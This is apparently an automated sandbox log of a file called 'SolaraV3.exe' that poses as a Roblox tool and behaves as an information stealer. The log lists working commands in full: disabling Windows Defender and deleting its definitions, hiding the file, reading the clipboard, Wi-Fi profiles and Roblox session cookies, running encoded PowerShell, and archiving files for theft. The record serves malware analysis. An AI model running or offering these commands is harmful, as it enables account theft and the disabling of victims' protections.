Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command blob removed]
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command blob removed]
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEBB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 110_2_00007FF74EEBB340
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC729570 cpuid 1_2_00007FF6DC729570
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
